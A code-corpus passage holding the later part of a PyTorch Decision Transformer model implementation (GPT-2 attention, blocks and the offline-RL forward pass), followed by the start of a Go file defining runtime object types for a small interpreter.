        attn_weights = attn_weights.type(value.dtype)
        attn_weights = self.attn_dropout(attn_weights)
        # Mask heads if we want to
        if head_mask is not None:
            attn_weights = attn_weights * head_mask
        attn_output = torch.matmul(attn_weights, value)
        return attn_output, attn_weights
    def _split_heads(self, tensor, num_heads, attn_head_size):
        """
        Splits hidden_size dim into attn_head_size and num_heads
        """
        new_shape = tensor.size()[:-1] + (num_heads, attn_head_size)
        tensor = tensor.view(new_shape)
        return tensor.permute(0, 2, 1, 3)  # (batch, head, seq_length, head_features)
    def _merge_heads(self, tensor, num_heads, attn_head_size):
        """
        Merges attn_head_size dim and num_attn_heads dim into hidden_size
        """
        tensor = tensor.permute(0, 2, 1, 3).contiguous()
        new_shape = tensor.size()[:-2] + (num_heads * attn_head_size,)
        return tensor.view(new_shape)
    def forward(
        self,
        hidden_states: Optional[Tuple[torch.FloatTensor]],
        layer_past: Optional[Tuple[torch.Tensor]] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        encoder_hidden_states: Optional[torch.Tensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        use_cache: Optional[bool] = False,
        output_attentions: Optional[bool] = False,
    ) -> Tuple[Union[torch.Tensor, Tuple[torch.Tensor]], ...]:
        """Run attention; returns (attn_output, present[, attn_weights])."""
        if encoder_hidden_states is not None:
            if not hasattr(self, "q_attn"):
                raise ValueError(
                    "If class is used as cross attention, the weights `q_attn` have to be defined. "
                    "Please make sure to instantiate class with `DecisionTransformerGPT2Attention(..., is_cross_attention=True)`."
                )
            query = self.q_attn(hidden_states)
            key, value = self.c_attn(encoder_hidden_states).split(self.split_size, dim=2)
            attention_mask = encoder_attention_mask
        else:
            query, key, value = self.c_attn(hidden_states).split(self.split_size, dim=2)
        query = self._split_heads(query, self.num_heads, self.head_dim)
        key = self._split_heads(key, self.num_heads, self.head_dim)
        value = self._split_heads(value, self.num_heads, self.head_dim)
        # prepend cached keys/values from previous decoding steps
        if layer_past is not None:
            past_key, past_value = layer_past
            key = torch.cat((past_key, key), dim=-2)
            value = torch.cat((past_value, value), dim=-2)
        if use_cache is True:
            present = (key, value)
        else:
            present = None
        if self.reorder_and_upcast_attn:
            attn_output, attn_weights = self._upcast_and_reordered_attn(query, key, value, attention_mask, head_mask)
        else:
            attn_output, attn_weights = self._attn(query, key, value, attention_mask, head_mask)
        attn_output = self._merge_heads(attn_output, self.num_heads, self.head_dim)
        attn_output = self.c_proj(attn_output)
        attn_output = self.resid_dropout(attn_output)
        outputs = (attn_output, present)
        if output_attentions:
            outputs += (attn_weights,)
        return outputs  # a, present, (attentions)
# Copied from transformers.models.gpt2.modeling_gpt2.GPT2MLP with GPT2->DecisionTransformerGPT2
class DecisionTransformerGPT2MLP(nn.Module):
    """Position-wise feed-forward block of a GPT-2 layer.

    Projects hidden states up to `intermediate_size`, applies the
    configured activation, projects back down to the hidden size, and
    finishes with residual dropout.
    """

    def __init__(self, intermediate_size, config):
        super().__init__()
        hidden = config.hidden_size
        self.c_fc = Conv1D(intermediate_size, hidden)
        self.c_proj = Conv1D(hidden, intermediate_size)
        self.act = ACT2FN[config.activation_function]
        self.dropout = nn.Dropout(config.resid_pdrop)

    def forward(self, hidden_states: Optional[Tuple[torch.FloatTensor]]) -> torch.FloatTensor:
        # up-project -> nonlinearity -> down-project -> dropout
        projected = self.act(self.c_fc(hidden_states))
        return self.dropout(self.c_proj(projected))
# Copied from transformers.models.gpt2.modeling_gpt2.GPT2Block with GPT2->DecisionTransformerGPT2
class DecisionTransformerGPT2Block(nn.Module):
    """One GPT-2 transformer layer: pre-LN self-attention, optional
    pre-LN cross-attention, and a pre-LN MLP, each with a residual
    connection."""
    def __init__(self, config, layer_idx=None):
        super().__init__()
        hidden_size = config.hidden_size
        # MLP inner width defaults to 4 * hidden_size when n_inner is unset
        inner_dim = config.n_inner if config.n_inner is not None else 4 * hidden_size
        self.ln_1 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
        self.attn = DecisionTransformerGPT2Attention(config, layer_idx=layer_idx)
        self.ln_2 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
        if config.add_cross_attention:
            self.crossattention = DecisionTransformerGPT2Attention(
                config, is_cross_attention=True, layer_idx=layer_idx
            )
            self.ln_cross_attn = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
        self.mlp = DecisionTransformerGPT2MLP(inner_dim, config)
    def forward(
        self,
        hidden_states: Optional[Tuple[torch.FloatTensor]],
        layer_past: Optional[Tuple[torch.Tensor]] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        encoder_hidden_states: Optional[torch.Tensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        use_cache: Optional[bool] = False,
        output_attentions: Optional[bool] = False,
    ) -> Union[Tuple[torch.Tensor], Optional[Tuple[torch.Tensor, Tuple[torch.FloatTensor, ...]]]]:
        """Returns (hidden_states, present[, attentions[, cross_attentions]])."""
        residual = hidden_states
        hidden_states = self.ln_1(hidden_states)
        attn_outputs = self.attn(
            hidden_states,
            layer_past=layer_past,
            attention_mask=attention_mask,
            head_mask=head_mask,
            use_cache=use_cache,
            output_attentions=output_attentions,
        )
        attn_output = attn_outputs[0]  # output_attn: a, present, (attentions)
        outputs = attn_outputs[1:]
        # residual connection
        hidden_states = attn_output + residual
        if encoder_hidden_states is not None:
            # add one self-attention block for cross-attention
            if not hasattr(self, "crossattention"):
                raise ValueError(
                    f"If `encoder_hidden_states` are passed, {self} has to be instantiated with "
                    "cross-attention layers by setting `config.add_cross_attention=True`"
                )
            residual = hidden_states
            hidden_states = self.ln_cross_attn(hidden_states)
            cross_attn_outputs = self.crossattention(
                hidden_states,
                attention_mask=attention_mask,
                head_mask=head_mask,
                encoder_hidden_states=encoder_hidden_states,
                encoder_attention_mask=encoder_attention_mask,
                output_attentions=output_attentions,
            )
            attn_output = cross_attn_outputs[0]
            # residual connection
            hidden_states = residual + attn_output
            outputs = outputs + cross_attn_outputs[2:]  # add cross attentions if we output attention weights
        residual = hidden_states
        hidden_states = self.ln_2(hidden_states)
        feed_forward_hidden_states = self.mlp(hidden_states)
        # residual connection
        hidden_states = residual + feed_forward_hidden_states
        # drop the `present` slot from outputs when the cache is disabled
        if use_cache:
            outputs = (hidden_states,) + outputs
        else:
            outputs = (hidden_states,) + outputs[1:]
        return outputs  # hidden_states, present, (attentions, cross_attentions)
class DecisionTransformerGPT2PreTrainedModel(PreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """
    config_class = DecisionTransformerConfig
    load_tf_weights = load_tf_weights_in_gpt2
    base_model_prefix = "transformer"
    is_parallelizable = True
    supports_gradient_checkpointing = True
    def __init__(self, *inputs, **kwargs):
        super().__init__(*inputs, **kwargs)
    def _init_weights(self, module):
        """Initialize the weights."""
        if isinstance(module, (nn.Linear, Conv1D)):
            # Slightly different from the TF version which uses truncated_normal for initialization
            # cf https://github.com/pytorch/pytorch/pull/5617
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
            if module.bias is not None:
                module.bias.data.zero_()
        elif isinstance(module, nn.Embedding):
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
            if module.padding_idx is not None:
                module.weight.data[module.padding_idx].zero_()
        elif isinstance(module, nn.LayerNorm):
            # LayerNorm starts as identity: zero shift, unit scale
            module.bias.data.zero_()
            module.weight.data.fill_(1.0)
        # Reinitialize selected weights subject to the OpenAI GPT-2 Paper Scheme:
        # > A modified initialization which accounts for the accumulation on the residual path with model depth. Scale
        # > the weights of residual layers at initialization by a factor of 1/√N where N is the # of residual layers.
        # >   -- GPT-2 :: https://openai.com/blog/better-language-models/
        #
        # Reference (Megatron-LM): https://github.com/NVIDIA/Megatron-LM/blob/main/megatron/model/gpt_model.py
        for name, p in module.named_parameters():
            if "c_proj" in name and "weight" in name:
                # Special Scaled Initialization --> There are 2 Layer Norms per Transformer Block
                p.data.normal_(mean=0.0, std=(self.config.initializer_range / math.sqrt(2 * self.config.n_layer)))
    def _set_gradient_checkpointing(self, module, value=False):
        # Toggle gradient checkpointing on the inner GPT-2 backbone only
        if isinstance(module, DecisionTransformerGPT2Model):
            module.gradient_checkpointing = value
class DecisionTransformerGPT2Model(DecisionTransformerGPT2PreTrainedModel):
    """GPT-2 backbone used inside the Decision Transformer: token + position
    embeddings, a stack of `DecisionTransformerGPT2Block`s, and a final
    LayerNorm. Mirrors `transformers` GPT2Model (forward is copied from it)."""
    _keys_to_ignore_on_load_missing = ["attn.masked_bias"]
    def __init__(self, config):
        super().__init__(config)
        self.embed_dim = config.hidden_size
        self.wte = nn.Embedding(config.vocab_size, self.embed_dim)
        self.wpe = nn.Embedding(config.max_position_embeddings, self.embed_dim)
        self.drop = nn.Dropout(config.embd_pdrop)
        self.h = nn.ModuleList(
            [DecisionTransformerGPT2Block(config, layer_idx=i) for i in range(config.num_hidden_layers)]
        )
        self.ln_f = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon)
        # Model parallel
        self.model_parallel = False
        self.device_map = None
        self.gradient_checkpointing = False
        # Initialize weights and apply final processing
        self.post_init()
    def get_input_embeddings(self):
        return self.wte
    def set_input_embeddings(self, new_embeddings):
        self.wte = new_embeddings
    # Copied from transformers.models.gpt2.modeling_gpt2.GPT2Model.forward
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        encoder_hidden_states: Optional[torch.Tensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        use_cache: Optional[bool] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, BaseModelOutputWithPastAndCrossAttentions]:
        """Standard GPT-2 forward; per-argument unset flags fall back to config."""
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        use_cache = use_cache if use_cache is not None else self.config.use_cache
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        # exactly one of input_ids / inputs_embeds must be provided
        if input_ids is not None and inputs_embeds is not None:
            raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
        elif input_ids is not None:
            input_shape = input_ids.size()
            input_ids = input_ids.view(-1, input_shape[-1])
            batch_size = input_ids.shape[0]
        elif inputs_embeds is not None:
            input_shape = inputs_embeds.size()[:-1]
            batch_size = inputs_embeds.shape[0]
        else:
            raise ValueError("You have to specify either input_ids or inputs_embeds")
        device = input_ids.device if input_ids is not None else inputs_embeds.device
        if token_type_ids is not None:
            token_type_ids = token_type_ids.view(-1, input_shape[-1])
        if position_ids is not None:
            position_ids = position_ids.view(-1, input_shape[-1])
        if past_key_values is None:
            past_length = 0
            past_key_values = tuple([None] * len(self.h))
        else:
            past_length = past_key_values[0][0].size(-2)
        if position_ids is None:
            # positions continue from the cached prefix length
            position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device)
            position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1])
        # GPT2Attention mask.
        if attention_mask is not None:
            if batch_size <= 0:
                raise ValueError("batch_size has to be defined and > 0")
            attention_mask = attention_mask.view(batch_size, -1)
            # We create a 3D attention mask from a 2D tensor mask.
            # Sizes are [batch_size, 1, 1, to_seq_length]
            # So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
            # this attention mask is more simple than the triangular masking of causal attention
            # used in OpenAI GPT, we just need to prepare the broadcast dimension here.
            attention_mask = attention_mask[:, None, None, :]
            # Since attention_mask is 1.0 for positions we want to attend and 0.0 for
            # masked positions, this operation will create a tensor which is 0.0 for
            # positions we want to attend and the dtype's smallest value for masked positions.
            # Since we are adding it to the raw scores before the softmax, this is
            # effectively the same as removing these entirely.
            attention_mask = attention_mask.to(dtype=self.dtype)  # fp16 compatibility
            attention_mask = (1.0 - attention_mask) * torch.finfo(self.dtype).min
        # If a 2D or 3D attention mask is provided for the cross-attention
        # we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
        if self.config.add_cross_attention and encoder_hidden_states is not None:
            encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
            encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
            if encoder_attention_mask is None:
                encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
            encoder_attention_mask = self.invert_attention_mask(encoder_attention_mask)
        else:
            encoder_attention_mask = None
        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # head_mask has shape n_layer x batch x n_heads x N x N
        head_mask = self.get_head_mask(head_mask, self.config.n_layer)
        if inputs_embeds is None:
            inputs_embeds = self.wte(input_ids)
        position_embeds = self.wpe(position_ids)
        hidden_states = inputs_embeds + position_embeds
        if token_type_ids is not None:
            token_type_embeds = self.wte(token_type_ids)
            hidden_states = hidden_states + token_type_embeds
        hidden_states = self.drop(hidden_states)
        output_shape = input_shape + (hidden_states.size(-1),)
        if self.gradient_checkpointing and self.training:
            if use_cache:
                # checkpointing recomputes activations, which is incompatible
                # with returning a KV cache
                logger.warning_once(
                    "`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..."
                )
                use_cache = False
        presents = () if use_cache else None
        all_self_attentions = () if output_attentions else None
        all_cross_attentions = () if output_attentions and self.config.add_cross_attention else None
        all_hidden_states = () if output_hidden_states else None
        for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)):
            # Model parallel
            if self.model_parallel:
                torch.cuda.set_device(hidden_states.device)
                # Ensure layer_past is on same device as hidden_states (might not be correct)
                if layer_past is not None:
                    layer_past = tuple(past_state.to(hidden_states.device) for past_state in layer_past)
                # Ensure that attention_mask is always on the same device as hidden_states
                if attention_mask is not None:
                    attention_mask = attention_mask.to(hidden_states.device)
                if isinstance(head_mask, torch.Tensor):
                    head_mask = head_mask.to(hidden_states.device)
            if output_hidden_states:
                all_hidden_states = all_hidden_states + (hidden_states,)
            if self.gradient_checkpointing and self.training:
                def create_custom_forward(module):
                    def custom_forward(*inputs):
                        # None for past_key_value
                        return module(*inputs, use_cache, output_attentions)
                    return custom_forward
                outputs = torch.utils.checkpoint.checkpoint(
                    create_custom_forward(block),
                    hidden_states,
                    None,
                    attention_mask,
                    head_mask[i],
                    encoder_hidden_states,
                    encoder_attention_mask,
                )
            else:
                outputs = block(
                    hidden_states,
                    layer_past=layer_past,
                    attention_mask=attention_mask,
                    head_mask=head_mask[i],
                    encoder_hidden_states=encoder_hidden_states,
                    encoder_attention_mask=encoder_attention_mask,
                    use_cache=use_cache,
                    output_attentions=output_attentions,
                )
            hidden_states = outputs[0]
            if use_cache is True:
                presents = presents + (outputs[1],)
            if output_attentions:
                # attention weights sit at index 2 when a `present` is
                # included in the block outputs, index 1 otherwise
                all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],)
                if self.config.add_cross_attention:
                    all_cross_attentions = all_cross_attentions + (outputs[3 if use_cache else 2],)
            # Model Parallel: If it's the last layer for that device, put things on the next device
            if self.model_parallel:
                for k, v in self.device_map.items():
                    if i == v[-1] and "cuda:" + str(k) != self.last_device:
                        hidden_states = hidden_states.to("cuda:" + str(k + 1))
        hidden_states = self.ln_f(hidden_states)
        hidden_states = hidden_states.view(output_shape)
        # Add last hidden state
        if output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)
        if not return_dict:
            return tuple(
                v
                for v in [hidden_states, presents, all_hidden_states, all_self_attentions, all_cross_attentions]
                if v is not None
            )
        return BaseModelOutputWithPastAndCrossAttentions(
            last_hidden_state=hidden_states,
            past_key_values=presents,
            hidden_states=all_hidden_states,
            attentions=all_self_attentions,
            cross_attentions=all_cross_attentions,
        )
@dataclass
class DecisionTransformerOutput(ModelOutput):
    """
    Base class for model's outputs that also contains a pooling of the last hidden states.
    Args:
        last_hidden_state (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`):
            Sequence of hidden-states at the output of the last layer of the model.
        state_preds (`torch.FloatTensor` of shape `(batch_size, sequence_length, state_dim)`):
            Environment state predictions
        action_preds (`torch.FloatTensor` of shape `(batch_size, sequence_length, action_dim)`):
            Model action predictions
        return_preds (`torch.FloatTensor` of shape `(batch_size, sequence_length, 1)`):
            Predicted returns for each state
        hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, sequence_length, hidden_size)`.
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`.
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
            heads.
    """
    # All fields default to None so callers can populate any subset;
    # ModelOutput drops None entries from tuple/dict views.
    state_preds: torch.FloatTensor = None
    action_preds: torch.FloatTensor = None
    return_preds: torch.FloatTensor = None
    hidden_states: torch.FloatTensor = None
    attentions: torch.FloatTensor = None
    last_hidden_state: torch.FloatTensor = None
class DecisionTransformerPreTrainedModel(PreTrainedModel):
    """
    An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
    models.
    """
    config_class = DecisionTransformerConfig
    base_model_prefix = "decision_transformer"
    # the model is driven by environment states rather than token ids
    main_input_name = "states"
    supports_gradient_checkpointing = False
    _keys_to_ignore_on_load_missing = [r"position_ids"]
    def _init_weights(self, module):
        """Initialize the weights"""
        if isinstance(module, nn.Linear):
            # Slightly different from the TF version which uses truncated_normal for initialization
            # cf https://github.com/pytorch/pytorch/pull/5617
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
            if module.bias is not None:
                module.bias.data.zero_()
        elif isinstance(module, nn.Embedding):
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
            if module.padding_idx is not None:
                module.weight.data[module.padding_idx].zero_()
        elif isinstance(module, nn.LayerNorm):
            # LayerNorm starts as identity: zero shift, unit scale
            module.bias.data.zero_()
            module.weight.data.fill_(1.0)
DECISION_TRANSFORMER_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) sub-class. Use
it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`~DecisionTransformerConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
DECISION_TRANSFORMER_INPUTS_DOCSTRING = r"""
Args:
states (`torch.FloatTensor` of shape `(batch_size, episode_length, state_dim)`):
The states for each step in the trajectory
actions (`torch.FloatTensor` of shape `(batch_size, episode_length, act_dim)`):
The actions taken by the "expert" policy for the current state, these are masked for auto regressive
prediction
rewards (`torch.FloatTensor` of shape `(batch_size, episode_length, 1)`):
The rewards for each state, action
returns_to_go (`torch.FloatTensor` of shape `(batch_size, episode_length, 1)`):
The returns for each state in the trajectory
timesteps (`torch.LongTensor` of shape `(batch_size, episode_length)`):
The timestep for each step in the trajectory
attention_mask (`torch.LongTensor` of shape `(batch_size, episode_length)`):
Masking, used to mask the actions when performing autoregressive prediction
"""
@add_start_docstrings("The Decision Transformer Model", DECISION_TRANSFORMER_START_DOCSTRING)
class DecisionTransformerModel(DecisionTransformerPreTrainedModel):
    """
    The model builds upon the GPT2 architecture to perform autoregressive prediction of actions in an offline RL
    setting. Refer to the paper for more details: https://arxiv.org/abs/2106.01345
    """

    def __init__(self, config):
        super().__init__(config)
        self.config = config
        self.hidden_size = config.hidden_size
        # note: the only difference between this GPT2Model and the default Huggingface version
        # is that the positional embeddings are removed (since we'll add those ourselves)
        self.encoder = DecisionTransformerGPT2Model(config)

        # one embedding head per input modality; timestep embeddings replace
        # GPT2's positional embeddings
        self.embed_timestep = nn.Embedding(config.max_ep_len, config.hidden_size)
        self.embed_return = torch.nn.Linear(1, config.hidden_size)
        self.embed_state = torch.nn.Linear(config.state_dim, config.hidden_size)
        self.embed_action = torch.nn.Linear(config.act_dim, config.hidden_size)
        self.embed_ln = nn.LayerNorm(config.hidden_size)

        # note: we don't predict states or returns for the paper
        self.predict_state = torch.nn.Linear(config.hidden_size, config.state_dim)
        self.predict_action = nn.Sequential(
            *([nn.Linear(config.hidden_size, config.act_dim)] + ([nn.Tanh()] if config.action_tanh else []))
        )
        self.predict_return = torch.nn.Linear(config.hidden_size, 1)

        # Initialize weights and apply final processing
        self.post_init()

    @add_start_docstrings_to_model_forward(DECISION_TRANSFORMER_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @replace_return_docstrings(output_type=DecisionTransformerOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        states=None,
        actions=None,
        rewards=None,
        returns_to_go=None,
        timesteps=None,
        attention_mask=None,
        output_hidden_states=None,
        output_attentions=None,
        return_dict=None,
    ) -> Union[Tuple, DecisionTransformerOutput]:
        r"""
        Returns:

        Examples:

        ```python
        >>> from transformers import DecisionTransformerModel
        >>> import torch

        >>> model = DecisionTransformerModel.from_pretrained("edbeeching/decision-transformer-gym-hopper-medium")
        >>> # evaluation
        >>> model = model.to(device)
        >>> model.eval()

        >>> env = gym.make("Hopper-v3")
        >>> state_dim = env.observation_space.shape[0]
        >>> act_dim = env.action_space.shape[0]

        >>> state = env.reset()
        >>> states = torch.from_numpy(state).reshape(1, 1, state_dim).to(device=device, dtype=torch.float32)
        >>> actions = torch.zeros((1, 1, act_dim), device=device, dtype=torch.float32)
        >>> rewards = torch.zeros(1, 1, device=device, dtype=torch.float32)
        >>> target_return = torch.tensor(TARGET_RETURN, dtype=torch.float32).reshape(1, 1)
        >>> timesteps = torch.tensor(0, device=device, dtype=torch.long).reshape(1, 1)
        >>> attention_mask = torch.zeros(1, 1, device=device, dtype=torch.float32)

        >>> # forward pass
        >>> with torch.no_grad():
        ...     state_preds, action_preds, return_preds = model(
        ...         states=states,
        ...         actions=actions,
        ...         rewards=rewards,
        ...         returns_to_go=target_return,
        ...         timesteps=timesteps,
        ...         attention_mask=attention_mask,
        ...         return_dict=False,
        ...     )
        ```"""
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        batch_size, seq_length = states.shape[0], states.shape[1]

        if attention_mask is None:
            # attention mask for GPT: 1 if can be attended to, 0 if not
            # FIX: create the mask on the same device as the inputs; the previous
            # bare `torch.ones(...)` produced a CPU tensor that mixed with CUDA
            # inputs when running on GPU.
            attention_mask = torch.ones((batch_size, seq_length), dtype=torch.long, device=states.device)

        # embed each modality with a different head
        state_embeddings = self.embed_state(states)
        action_embeddings = self.embed_action(actions)
        returns_embeddings = self.embed_return(returns_to_go)
        time_embeddings = self.embed_timestep(timesteps)

        # time embeddings are treated similar to positional embeddings
        state_embeddings = state_embeddings + time_embeddings
        action_embeddings = action_embeddings + time_embeddings
        returns_embeddings = returns_embeddings + time_embeddings

        # this makes the sequence look like (R_1, s_1, a_1, R_2, s_2, a_2, ...)
        # which works nice in an autoregressive sense since states predict actions
        stacked_inputs = (
            torch.stack((returns_embeddings, state_embeddings, action_embeddings), dim=1)
            .permute(0, 2, 1, 3)
            .reshape(batch_size, 3 * seq_length, self.hidden_size)
        )
        stacked_inputs = self.embed_ln(stacked_inputs)

        # to make the attention mask fit the stacked inputs, have to stack it as well
        stacked_attention_mask = (
            torch.stack((attention_mask, attention_mask, attention_mask), dim=1)
            .permute(0, 2, 1)
            .reshape(batch_size, 3 * seq_length)
        )
        device = stacked_inputs.device
        # we feed in the input embeddings (not word indices as in NLP) to the model;
        # position_ids are zeroed out because time embeddings were added above
        encoder_outputs = self.encoder(
            inputs_embeds=stacked_inputs,
            attention_mask=stacked_attention_mask,
            position_ids=torch.zeros(stacked_attention_mask.shape, device=device, dtype=torch.long),
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        x = encoder_outputs[0]

        # reshape x so that the second dimension corresponds to the original
        # returns (0), states (1), or actions (2); i.e. x[:,1,t] is the token for s_t
        x = x.reshape(batch_size, seq_length, 3, self.hidden_size).permute(0, 2, 1, 3)

        # get predictions
        return_preds = self.predict_return(x[:, 2])  # predict next return given state and action
        state_preds = self.predict_state(x[:, 2])  # predict next state given state and action
        action_preds = self.predict_action(x[:, 1])  # predict next action given state
        if not return_dict:
            return (state_preds, action_preds, return_preds)

        return DecisionTransformerOutput(
            last_hidden_state=encoder_outputs.last_hidden_state,
            state_preds=state_preds,
            action_preds=action_preds,
            return_preds=return_preds,
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
        )
|
2833844911/gojsvmp | 4,998 | object/object.go | package object
import (
"encoding/hex"
"myvmp/ast"
"myvmp/token"
"strconv"
"strings"
"sync"
)
// SafeMap is a map[string]Object guarded by an RWMutex so it can be shared
// between goroutines.
type SafeMap struct {
	mu sync.RWMutex
	M  map[string]Object
}

// NewSafeMap returns an empty, ready-to-use SafeMap.
func NewSafeMap() *SafeMap {
	return &SafeMap{M: make(map[string]Object)}
}

// Set stores value under key, replacing any previous entry.
func (sm *SafeMap) Set(key string, value Object) {
	sm.mu.Lock()
	defer sm.mu.Unlock()
	sm.M[key] = value
}

// Get returns the value stored under key and whether it was present.
func (sm *SafeMap) Get(key string) (Object, bool) {
	sm.mu.RLock()
	defer sm.mu.RUnlock()
	v, found := sm.M[key]
	return v, found
}

// Delete removes key from the map; deleting a missing key is a no-op.
func (sm *SafeMap) Delete(key string) {
	sm.mu.Lock()
	defer sm.mu.Unlock()
	delete(sm.M, key)
}

// Object is the interface implemented by every runtime value of the VM.
type Object interface {
	Type() string     // type tag, one of the token.* type constants
	ToString() string // printable representation
}
// NumericObject is a numeric runtime value (always stored as float64,
// mirroring JavaScript numbers).
type NumericObject struct {
	Value float64
}

func (ob *NumericObject) Type() string {
	return token.TYNUM
}

// ToString formats the number without a fixed precision ('f', -1), so
// integers print without a trailing ".0".
func (ob *NumericObject) ToString() string {
	return strconv.FormatFloat(ob.Value, 'f', -1, 64)
}

// StringObject is a string runtime value.
type StringObject struct {
	Value string
	Key   string
}

func (ob *StringObject) Type() string {
	return token.TYSTR
}

// Slice returns the substring covering byte indices [start, end).
func (ob *StringObject) Slice(start int, end int) string {
	return ob.Value[start:end]
}

func (ob *StringObject) ToString() string {
	return ob.Value
}

// ByteObject is a raw byte-buffer runtime value.
type ByteObject struct {
	Value []byte
	Key   string
}

func (ob *ByteObject) Type() string {
	return token.BYTE
}

// ToString renders the buffer as a lowercase hex string.
func (ob *ByteObject) ToString() string {
	return hex.EncodeToString(ob.Value)
}
// NULLObject represents the interpreted language's null value.
type NULLObject struct {
}

func (ob *NULLObject) Type() string {
	return token.BULLE
}

func (ob *NULLObject) ToString() string {
	return token.NNNN
}

// NanObject represents the interpreted language's NaN value.
type NanObject struct {
}

func (ob *NanObject) Type() string {
	return token.NANINFO
}

func (ob *NanObject) ToString() string {
	return token.NANINFO
}
// Environment doubles as a lexical scope and as the backing store for arrays
// and objects: Store maps names/keys to values, Value holds array elements,
// and Outer points at the enclosing scope (nil at top level).
type Environment struct {
	Value    []*Object
	Store    *SafeMap
	Outer    *Environment
	Key      string
	TypeInfo string
}

// Type returns the environment's type tag, falling back to the numeric tag
// when no tag was set.
func (ob *Environment) Type() string {
	if ob.TypeInfo != "" {
		return ob.TypeInfo
	}
	return token.TYNUM
}

// ToString renders arrays/objects with their own tag, and any other
// environment as "this" (token.YOUZ/ZUOZ are presumably the "["/"]"
// delimiters — see their use as bracket tokens in the parser).
func (ob *Environment) ToString() string {
	switch ob.TypeInfo {
	case token.ArrayE, token.Object:
		return token.YOUZ + ob.TypeInfo + token.ZUOZ
	}
	return token.YOUZ + token.THIS + token.ZUOZ
}

// Slice returns the element pointers covering [start, end).
func (ob *Environment) Slice(start int, end int) []*Object {
	return ob.Value[start:end]
}
// BoolObject is a boolean runtime value.
type BoolObject struct {
	Value bool
}

func (ob *BoolObject) Type() string {
	return token.BOOL
}

// ToString renders the value as the language's true/false literal.
func (ob *BoolObject) ToString() string {
	// idiomatic Go: test the bool directly instead of comparing `== true`
	if ob.Value {
		return token.TRUE
	}
	return token.FALSE
}

// BreakObject signals a `break` statement to the evaluator.
type BreakObject struct {
}

func (ob *BreakObject) Type() string {
	return token.BREAK
}

func (ob *BreakObject) ToString() string {
	return token.BREAK
}

// ContinueObject signals a `continue` statement to the evaluator.
type ContinueObject struct {
}

func (ob *ContinueObject) Type() string {
	return token.CONTINUE
}

func (ob *ContinueObject) ToString() string {
	return token.CONTINUE
}
// FunctionDeclarationObject is a callable runtime value: either a
// user-defined function (Params/Body evaluated in Env) or a native Go
// builtin (NativeBody, selected when IsNative == 1).
type FunctionDeclarationObject struct {
	Params     []*ast.Statement                           // declared parameter list (user-defined functions)
	Args       []*Object                                  // actual arguments for the current call
	Body       ast.Statement                              // function body (user-defined functions)
	NativeBody *func(*FunctionDeclarationObject) Object   // Go implementation (native builtins)
	Env        *Environment                               // closure / receiver environment
